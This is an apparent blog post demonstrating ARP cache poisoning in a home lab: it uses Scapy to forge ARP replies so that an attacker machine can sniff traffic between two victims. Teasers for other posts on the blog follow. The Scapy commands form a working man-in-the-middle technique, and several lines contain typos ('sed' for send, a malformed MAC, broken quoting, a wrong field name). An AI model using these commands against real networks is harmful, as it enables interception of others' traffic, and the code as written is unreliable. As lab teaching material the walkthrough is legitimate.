ARP Poison

-
In a network, each machine communicates to the other using PHY (MAC) address. 
Every system maintain a cache(IP<->MAC) of neighbor system.
Manipulating the cache by mapping VICTIM IP to ATTACKER MAC address will result in redirection of data to the ATTACKER instead of VICTIM

Commands (To View ARP Table)

root:~#arp -a


Software

Scapy (Packet creation Tool)


Setting

MAC       => 172.16.84.1      => [00:50:56:c0:00:08] => VICTIM-1
KALI       => 172.16.84.140 => [00:0c:29:c0:22:41]  => VICTIM-2
PARROT => 172.16.84.142 => [00:0c:29:fe:93:76]   => ATTACKER

Target

ATTACKER(PARROT) needs to sniff the traffic between VICTIM-1(MAC) and VICTIM-2(KALI)

Poison the MAC ARP Cache Table(from Parrot)


  1. Attacker create spoofed ARP packet (maps attacker PHY address to the VICTIM-2 IP)
  2. Attacker send the spoofed ARP packets to the network
  3. MAC machine ARP cache table is poisoned by the spoofed ARP packet 
1 way communication can be sniffed now

root@parrot~#scapy
>>>pckt=ARP()
>>>pckt.op=2
>>>pckt.pdst=172.16.84.1
>>>pckt.psrc=172.16.84.140
>>>pckt.hwdst=“00:c:29:fe:93:76”
>>>pckt.show()
>>>sed(pckt,loop=1)  #Send packet infinite times

Before and After ARP Poison (MAC ARP Table) - "172.16.84.140" Spoofed








Poison the KALI ARP Cache Table(from Parrot)



  1. Attacker create spoofed ARP packet (maps attacker MAC address to the VICTIM-1 IP)
  2. Attacker send the spoofed ARP packets to the network
  3. KALI machine ARP cache is poisoned by the spoofed ARP packet 

2 way communication can be sniffed now

root@parrot~#scapy
>>>pckt=ARP()
>>>pckt.op=2
>>>pckt.pdst=“172.16.84.140”
>>>pckt.src=“172.16.84.1
>>>pckt.hwdst=“00:c:29:fe:93:76”
>>>pckt.show()
>>>sed(pckt,loop=1)  #Send packet infinite times

Before and After ARP Poison (KALI ARP Table) - "172.16.84.1" Spoofed













PING Operation after spoofing (Packet goes via ATTACKER - PARROT)



Comments

Post a Comment

Popular posts from this blog

JTAG PIN Identification

-
Image
My Setup Parrot Linux Arduino UNO Broadlink RM Mini  Software Arduino IDE JTAGEnum ( https://github.com/cyphunk/JTAGenum ) JTAG PINS to be Identified TCK   - Test Clock TMS  - Test Mode  TDI   - Test Data IN TDO  - Test Data Out GND  - Ground Hardware Connection Set up Connect Laptop and Arduino (USB cable) Arduino Digital PIN (any 5 pins) to RM Mini (5 pins) [Except 1 - VCC and 1 - GND] Note: If you are using JTAGENUM, the JTAGenum sketch uses the DIGITAL PIN from 2 to 11. Refer the line number 72(ino file) Software Connection Set up Download the INO sketch from the github Open the Arduino IDE and Load the downloaded JTAGEnum sketch Choose the correct Serial Port and Board Compile and Upload the sketch Open the Serial Monitor Set the correct baud rate Enter the command to scan ("s") Arduino PIN Layout Digital PIN 2(Black) Digital PIN 3(White) Digital PIN 4(Grey)
Read more
-
Image
Rubber Ducky - Arduino UNO Configuration for Arduino UNO Board: Download and install the Latest version of Arduino ( Recommended : Linux/Mac) Download Boot-loader Sketch(INO) from reference URL Open the INO file in the Arduino IDE Connect a Plain(no other wire connection) Arduino UNO to Laptop via USB cable In Arduino IDE, Select Tools->Board->Arduino/Genuino UNO In Arduino IDE, Select Tools->Port->ttyACM0 [Yours could be different. Use dmesg command to identify] Verify and Upload the Code Wait for the message “Upload Done” and Disconnect the USB cable  Make the cable connection as per the below screenshot attached Connect the USB cable again back to laptop and the boot loader will install by itself Wait for 1 to 2 min till the boot-loader get installed Disconnect USB cable from the laptop and disconnect all the jump wire and make the board plain Configuration for Arduino IDE: Connect the Board to laptop via USB cable Navigate File->Pref
Read more

CWE vs CVE

-
CWE: The Common Weakness Enumeration (CWE) is a formal list of software weakness types created to Serve as a common language for describing software security weaknesses in architecture, design, or code.  Reference: http://cwe.mitre.org/about/index.html   CVE: CVE is a list of information security vulnerabilities and exposures that aims to provide common names for publicly known problems. Reference: http://cve.mitre.org/about/terminology.html http://cve.mitre.org/about/index.html Difference (CWE vs CVE): Software vulnerability is a collection of one or more weaknesses that contain the possible way for an attacker to perform unintended behavior. So a weakness is a patterns or behaviors, a group of weakness or a single weakness may help to perform unintended behavior. In other word, When the weakness can be used by an attacker against the software then that's a vulnerability. For example , If an address parameter in register page is not properly validated
Read more